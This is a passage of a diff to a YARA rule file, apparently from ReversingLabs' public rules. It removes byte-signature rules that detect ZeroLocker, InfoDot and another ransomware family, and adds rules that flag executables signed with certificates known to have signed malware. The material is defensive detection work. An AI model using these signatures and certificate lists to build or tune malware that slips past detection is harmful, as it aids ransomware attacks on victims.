?? 3C ?? 75 ?? 8D 47 ?? 3B C8 74 ?? 52 33 DB 53 53 57 E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? - ?? ?? ?? 8A 85 ?? ?? ?? ?? 33 DB 3C ?? 74 ?? 3C ?? 74 ?? 3C ?? 8A C3 75 ?? B0 ?? 2B - CF 0F B6 C0 41 89 9D ?? ?? ?? ?? F7 D8 89 9D ?? ?? ?? ?? 56 1B C0 89 9D ?? ?? ?? ?? - 23 C1 89 9D ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 88 9D ?? ?? ?? ?? E8 ?? - ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 57 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? F7 D8 - } - $find_files_p2 = { - 1B C0 53 53 53 51 F7 D0 23 85 ?? ?? ?? ?? 53 50 FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 75 - ?? FF B5 ?? ?? ?? ?? 53 53 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B D8 E9 ?? ?? ?? ?? 8B 85 ?? - ?? ?? ?? 8B 48 ?? 2B 08 C1 F9 ?? 89 8D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? - ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 88 9D ?? ?? ?? ?? E8 ?? ?? - ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? - ?? 83 C4 ?? F7 D8 1B C0 F7 D0 23 85 ?? ?? ?? ?? 80 38 ?? 75 ?? 8A 48 ?? 84 C9 74 ?? - 80 F9 ?? 75 ?? 38 58 ?? 74 ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 57 50 E8 ?? ?? ?? - ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 85 C0 75 ?? 38 9D ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ?? - E8 ?? ?? ?? ?? 59 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? - 8B 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 10 8B 40 ?? 2B C2 C1 F8 ?? 3B C8 74 ?? 68 ?? - ?? ?? ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 38 9D ?? ?? ?? ?? - 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 59 8B D8 56 FF 15 ?? ?? ?? - ?? 80 BD ?? ?? ?? ?? ?? 5E 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8B C3 8B 4D ?? - 5F 33 CD 5B E8 ?? ?? ?? ?? C9 C3 - } - $encrypt_files = { - 53 8B DC 83 EC ?? 83 E4 ?? 83 C4 ?? 55 8B 6B ?? 89 6C 24 ?? 8B EC 6A ?? 68 ?? ?? ?? - ?? 64 A1 ?? ?? ?? ?? 50 53 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 50 8D 45 - ?? 64 A3 ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 6A ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? - C7 45 ?? ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4B ?? 51 - FF 15 ?? ?? ?? ?? 83 E0 ?? 74 ?? 8B 53 ?? 52 FF 15 ?? ?? ?? ?? 83 E0 ?? 50 8B 43 ?? - 50 FF 15 ?? ?? ?? ?? 8B 4B ?? 51 8B 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 53 - ?? 52 8D 45 ?? 50 83 EC ?? 8B CC 89 A5 ?? ?? ?? ?? 51 8B 8D ?? ?? ?? ?? E8 ?? ?? ?? - ?? 8B 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? - ?? ?? C6 45 ?? ?? 8D 55 ?? 52 8B 43 ?? 50 8D 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? C6 45 - ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 8B 43 ?? 50 8D - 4D ?? 51 83 EC ?? 8B D4 89 A5 ?? ?? ?? ?? 52 8B 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 8D - ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 8B 43 ?? 50 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? - C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? C7 45 ?? ?? - ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 8B 4D ?? - 33 CD E8 ?? ?? ?? ?? 8B E5 5D 8B E3 5B C2 - } + condition: + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Xin Zhou" and pe.signatures[i].serial=="41:bd:49:bb:45:66:44:d8:18:3b:3d:ae:72:ec:8f:22" and 1468454400<=pe.signatures[i].not_after) +} +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_A8D40Da6708679C08Aebddea6D3F6B8A : INFO FILE +{ + meta: + description = "Certificate used for digitally signing malware." + author = "ReversingLabs" + id = "a4224bf1-1875-5b2c-b79d-998d3766d163" + date = "2023-11-08" + modified = "2023-11-08" + reference = "ReversingLabs" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L15646-L15664" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "27ec32791eaeccb8aa95d023c4fc8943f0435c32d8a17bde98d7d0b02ba17e59" + score = 75 + quality = 90 + tags = "INFO, FILE" + status = "RELEASED" + sharing = "TLP:WHITE" + category = "INFO" + importance = 25 condition: - uint16(0)==0x5A4D and ( all of ($find_files_p*)) and ($encrypt_files) and (($exclude_directories_and_drop_ransom_note) or ($drop_ransom_note_no_dir_exclusion)) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "VELES LTD." and (pe.signatures[i].serial=="00:a8:d4:0d:a6:70:86:79:c0:8a:eb:dd:ea:6d:3f:6b:8a" or pe.signatures[i].serial=="a8:d4:0d:a6:70:86:79:c0:8a:eb:dd:ea:6d:3f:6b:8a") and 1547424000<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Zerolocker : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_307642E1F3A92C6Cc2E7Fb6E18F2Ddcb : INFO FILE { meta: - description = "Yara rule that detects ZeroLocker ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "291b5640-387c-54d9-97a6-13823932fa60" - date = "2021-08-12" - modified = "2021-08-12" + id = "6dd35efb-daea-5668-a01d-f5b80371b04c" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/ByteCode.MSIL.Ransomware.ZeroLocker.yara#L1-L70" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "147e4b390bcfaff8f05059c1d9a98b50f544fc32e820406417894fe5046e0f71" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L15666-L15682" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "8c96fbd10672b0b258a80f3abaf0320540c5ff0a4636f011cfe7cfa8ccc482d0" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "ZeroLocker" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $encrypt_routine_1 = { - 00 28 5B 00 00 0A 20 ?? 07 00 00 28 60 00 00 06 13 09 20 ?? 07 00 00 28 60 00 00 06 13 - 0B 02 03 20 ?? 07 00 00 28 60 00 00 06 20 ?? 07 00 00 28 60 00 00 06 73 ?? 00 00 0A 7D - 1B 00 00 04 20 ?? 07 00 00 28 60 00 00 06 13 0B 02 04 20 ?? 07 00 00 28 60 00 00 06 20 - ?? 07 00 00 28 60 00 00 06 73 ?? 00 00 0A 7D 1C 00 00 04 20 ?? 07 00 00 28 60 00 00 06 - 13 0B 02 7B 1C 00 00 04 20 ?? 07 00 00 28 60 00 00 06 6A 6F ?? 00 00 0A 00 20 ?? 07 00 - 00 28 60 00 00 06 13 0B 20 ?? 07 00 00 28 60 00 00 06 8D 1E 00 00 01 0A 20 ?? 07 00 00 - 28 60 00 00 06 13 0B 20 ?? 07 00 00 28 60 00 00 06 6A 13 04 20 ?? 07 00 00 28 60 00 00 - 06 13 0B 02 7B 1B 00 00 04 6F ?? 00 00 0A [0-2] 13 05 20 ?? 07 00 00 28 60 00 00 06 13 - 0B 73 ?? 00 00 0A 0C 20 ?? 07 00 00 28 60 00 00 06 13 0B 00 0E 05 20 ?? 07 00 00 28 60 - 00 00 06 59 13 0C 11 0C 45 02 00 00 00 02 00 00 00 ?? 00 00 00 2B ?? 00 20 ?? 07 00 00 - 28 60 00 00 06 13 0B 02 7B 1C 00 00 04 08 05 0E 04 6F ?? 00 00 0A [0-2] 20 ?? 07 00 00 - 28 60 00 00 06 73 ?? 00 00 0A 0B 2B ?? 00 20 ?? 07 00 00 28 60 00 00 06 13 0B 02 7B 1C - 00 00 04 08 05 0E 04 6F ?? 00 00 0A [0-2] 20 ?? 07 00 00 28 60 00 00 06 73 ?? 00 00 0A - 0B 00 2B 62 20 ?? 07 00 00 28 60 00 00 06 13 0B 02 7B 1B 00 00 04 06 20 ?? 07 00 00 28 - 60 00 00 06 20 ?? 07 00 00 28 60 00 00 06 6F ?? 00 00 0A [0-2] 0D 20 ?? 07 00 00 28 60 - } - $encrypt_routine_2 = { - 00 00 06 13 0B 07 06 20 ?? 07 00 00 28 60 00 00 06 09 6F ?? 00 00 0A 00 20 ?? 07 00 00 - 28 60 00 00 06 13 0B 11 04 09 6A D6 13 04 00 20 ?? 07 00 00 28 60 00 00 06 13 0B 11 04 - 11 05 FE 04 13 0D 11 0D 2D 86 ?? 45 01 00 00 00 F6 FF FF FF 17 2D 06 D0 4F 00 00 06 26 - 20 ?? 07 00 00 28 60 00 00 06 13 0B 07 6F ?? 00 00 0A 00 20 ?? 07 00 00 28 60 00 00 06 - 13 0B 02 7B 1B 00 00 04 6F ?? 00 00 0A 00 20 ?? 07 00 00 28 60 00 00 06 13 0B 02 7B 1C - 00 00 04 6F ?? 00 00 0A 00 20 ?? 07 00 00 28 60 00 00 06 13 0B 0E 05 20 ?? 07 00 00 28 - 60 00 00 06 FE 01 13 0D 11 0D 2C 32 ?? 45 01 00 00 00 F6 FF FF FF 20 ?? 07 00 00 28 60 - 00 00 06 13 0B 03 73 ?? 00 00 0A 13 06 20 ?? 07 00 00 28 60 00 00 06 13 0B 11 06 6F ?? - 00 00 0A 00 00 20 ?? 07 00 00 28 60 00 00 06 13 0B 0E 05 20 ?? 07 00 00 28 60 00 00 06 - FE 01 13 0D 11 0D 2C ?? [0-20] 20 ?? 07 00 00 28 60 00 00 06 13 0B 03 73 ?? 00 00 0A 13 - 07 20 ?? 07 00 00 28 60 00 00 06 13 0B 11 07 6F ?? 00 00 0A 00 00 20 ?? ?? 00 00 28 60 - 00 00 06 13 0B 02 7B 1B 00 00 04 6F ?? 00 00 0A 00 20 ?? ?? 00 00 28 60 00 00 06 13 0B - 02 7B 1C 00 00 04 6F ?? 00 00 0A 00 DD 3B 01 00 00 11 0A 2B 0D 11 0A 20 ?? ?? 00 00 28 - } - $encrypt_routine_3 = { - 60 00 00 06 58 20 ?? 08 00 00 28 60 00 00 06 13 0A 45 26 00 00 00 00 00 00 00 ?? FC FF - FF ?? FC FF FF ?? FC FF FF ?? FC FF FF ?? FC FF FF ?? FC FF FF ?? FC FF FF ?? ?? FF FF - ?? FD FF FF ?? FD FF FF ?? FD FF FF 00 00 00 00 ?? FD FF FF ?? FD FF FF ?? FD FF FF ?? - FD FF FF ?? FD FF FF ?? FD FF FF ?? ?? FF FF ?? FD FF FF ?? FD FF FF ?? FD FF FF ?? ?? - FF FF ?? FE FF FF ?? FE FF FF ?? FE FF FF ?? FE FF FF ?? FE FF FF ?? FE FF FF ?? FE FF - FF ?? FE FF FF E8 FE FF FF FC FE FF FF 10 FF FF FF 11 FF FF FF 29 FF FF FF 41 FF FF FF - DE 6D 11 0B 13 0A 11 09 20 ?? 08 00 00 28 60 00 00 06 30 16 ?? 45 01 00 00 00 F6 FF FF - FF 20 ?? 08 00 00 28 60 00 00 06 2B 02 11 09 45 02 00 00 00 00 00 00 00 11 FF FF FF DE - 34 75 4B 00 00 01 14 FE 03 11 09 20 ?? 08 00 00 28 60 00 00 06 FE 03 5F 11 0A 20 ?? 08 - 00 00 28 60 00 00 06 FE 01 5F FE 11 74 4B 00 00 01 28 57 00 00 0A DE 93 20 ?? 08 00 00 - 28 60 00 00 06 28 ?? 00 00 0A - } + condition: + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "IBM" and pe.signatures[i].serial=="30:76:42:e1:f3:a9:2c:6c:c2:e7:fb:6e:18:f2:dd:cb" and 1500422400<=pe.signatures[i].not_after) +} +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_52379131A1C69263C795A7D398Db0997 : INFO FILE +{ + meta: + description = "Certificate used for digitally signing malware." + author = "ReversingLabs" + id = "478994c1-c1c4-5f11-b78f-fe237b687bef" + date = "2023-11-08" + modified = "2023-11-08" + reference = "ReversingLabs" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L15684-L15700" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "245e994024e08add755ec704b895286c115ac00eb5aeecde98fce96f35f6e9e0" + score = 75 + quality = 90 + tags = "INFO, FILE" + status = "RELEASED" + sharing = "TLP:WHITE" + category = "INFO" + importance = 25 condition: - uint16(0)==0x5A4D and ($encrypt_routine_1 and $encrypt_routine_2 and $encrypt_routine_3) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Beijing Caiyunshidai Technology Co., Ltd." and pe.signatures[i].serial=="52:37:91:31:a1:c6:92:63:c7:95:a7:d3:98:db:09:97" and 1476748800<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Infodot : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_44312Cb9A927B4111360762B4D4Bdd6D : INFO FILE { meta: - description = "Yara rule that detects InfoDot ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "2f6447f4-523b-5ea1-a16d-d68bb9bcc79d" - date = "2021-02-16" - modified = "2021-02-16" + id = "9bc1a8f4-36b7-52bd-9a65-fcd8ec2acf92" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.InfoDot.yara#L1-L115" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "24a1c25c1d70c21323417ae0892c613361c4bfc829737ef86b6fa7616ae668c6" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L15702-L15718" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "8e34636ed815812af478dd01eacd5298fa2cfeb420ee2f45e055f557534cae71" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "InfoDot" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $find_files_p1 = { - 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? - 33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B FA 8B D9 89 9D ?? ?? ?? ?? - 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? - ?? ?? 53 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? - 50 8D 85 ?? ?? ?? ?? 50 FF D3 8B F0 83 FE ?? 0F 84 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? EB - ?? 8D 49 ?? F6 85 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? - 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 - ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? - 8D 85 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 - ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? - ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 - ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 - C0 74 ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B FF 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 - ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 - 83 C8 ?? 85 C0 74 ?? 8D 85 ?? ?? ?? ?? 50 53 8D 85 ?? ?? ?? ?? 50 FF 15 - } - $find_files_p2 = { - 8B D7 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 - C0 0F 85 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8D 85 - ?? ?? ?? ?? 57 8B 3D ?? ?? ?? ?? 56 50 FF D7 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? - 50 FF D3 89 85 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 8D 9B ?? ?? ?? ?? F6 85 ?? ?? - ?? ?? ?? 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? - ?? 50 56 FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 8D 85 ?? ?? ?? ?? 50 FF D7 68 ?? - ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 33 C0 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? - C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? 66 39 85 ?? ?? ?? ?? 75 ?? 33 C9 - EB ?? 8D 8D ?? ?? ?? ?? 8D 51 ?? 90 66 8B 01 83 C1 ?? 66 85 C0 75 ?? 2B CA D1 F9 51 - 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 8D 8D ?? - ?? ?? ?? 8D 85 ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 51 50 E8 ?? ?? ?? ?? 99 83 C4 ?? 0B - C2 75 ?? 8B 85 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? 89 85 ?? ?? ?? ?? EB ?? C7 85 ?? ?? ?? - ?? ?? ?? ?? ?? 83 CB ?? 83 BD ?? ?? ?? ?? ?? 72 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? - 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F8 BA ?? ?? ?? ?? 8B CF 8D A4 24 - ?? ?? ?? ?? 66 8B 31 66 3B 32 75 ?? 66 85 F6 74 ?? 66 8B 41 ?? 66 3B 42 ?? 75 ?? 83 - } - $find_files_p3 = { - C1 ?? 83 C2 ?? 66 85 C0 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? B9 - ?? ?? ?? ?? 8B C7 8D 9B ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 - ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 - C0 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B C7 8D 9B ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ?? - 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0 - EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B C7 8D 9B ?? ?? ?? ?? - 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 - ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? - 8B C7 8D 9B ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 - ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? - ?? ?? ?? B8 ?? ?? ?? ?? 66 8B 0F 66 3B 08 75 ?? 66 85 C9 74 ?? 66 8B 4F ?? 66 3B 48 - ?? 75 ?? 83 C7 ?? 83 C0 ?? 66 85 C9 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? - ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 85 DB 7F ?? 8B 95 ?? ?? ?? ?? 7C ?? 81 - } - $find_files_p4 = { - FA ?? ?? ?? ?? 73 ?? 3B D8 0F 8F ?? ?? ?? ?? 7C ?? 3B D1 73 ?? 8D 8D ?? ?? ?? ?? E8 - ?? ?? ?? ?? 83 EC ?? 8D 95 ?? ?? ?? ?? 8B CC 51 E8 ?? ?? ?? ?? 83 C4 ?? E8 ?? ?? ?? - ?? 83 C4 ?? 84 C0 74 ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 3B D8 7F - ?? 7C ?? 8B 85 ?? ?? ?? ?? 3B C1 73 ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? - ?? ?? ?? 8D 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 50 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D - 8D ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? EB ?? 8B 85 ?? ?? ?? ?? 8B 3D ?? - ?? ?? ?? 8B B5 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 50 FF 15 ?? ?? ?? - ?? 85 C0 8B 85 ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 64 89 0D - ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 - } - $encrypt_files = { - 55 8B EC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 56 8B F1 C7 85 - ?? ?? ?? ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 56 50 E8 ?? ?? ?? ?? 83 C4 - ?? 85 C0 74 ?? 83 C8 ?? 5E 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 56 8D 85 ?? ?? - ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? - ?? 50 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? - 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 0F 57 - C0 68 ?? ?? ?? ?? 50 F3 0F 7F 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? - ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? - ?? ?? ?? 50 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? - 57 FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 68 ?? - ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85 - ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 74 ?? 8B FF - 81 FF ?? ?? ?? ?? 75 ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 57 50 - 50 E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 57 6A ?? 50 E8 ?? ?? ?? ?? FF - B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 57 6A ?? 50 E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 75 - ?? 8B C7 25 ?? ?? ?? ?? 79 ?? 48 83 C8 ?? 40 BE ?? ?? ?? ?? 2B F0 8D 85 ?? ?? ?? ?? - 56 03 C7 56 50 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 03 F7 8D 85 ?? ?? - ?? ?? 56 50 50 E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 56 6A ?? 50 E8 ?? - ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? - 83 C4 ?? 33 CD 33 C0 5F 5E E8 ?? ?? ?? ?? 8B E5 5D C3 - } + condition: + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "BEAR ADAMS CONSULTING LIMITED" and pe.signatures[i].serial=="44:31:2c:b9:a9:27:b4:11:13:60:76:2b:4d:4b:dd:6d" and 1554768000<=pe.signatures[i].not_after) +} +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_123A5074069162F4Ed68Fc7D48F464C2 : INFO FILE +{ + meta: + description = "Certificate used for digitally signing malware." + author = "ReversingLabs" + id = "601ddd98-8cd5-5c52-a59a-d4a0556fc316" + date = "2023-11-08" + modified = "2023-11-08" + reference = "ReversingLabs" + source_url = 